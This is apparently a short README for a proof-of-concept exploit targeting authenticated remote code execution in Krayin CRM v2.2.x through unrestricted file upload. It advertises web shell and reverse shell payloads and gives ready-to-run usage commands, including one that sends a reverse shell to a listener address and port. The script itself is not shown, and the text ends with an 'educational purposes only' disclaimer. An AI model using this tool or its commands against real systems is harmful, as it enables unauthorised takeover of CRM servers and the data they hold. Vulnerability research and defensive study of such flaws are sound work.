
Proof-of-concept exploit for authenticated remote code execution in Krayin CRM v2.2.x via unrestricted file upload, supporting web shell and reverse shell payloads.
PoC script for critical vulnerability in Krayin CRM v2.2.x allowing authenticated RCE via unrestricted file upload.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
For educational purposes only.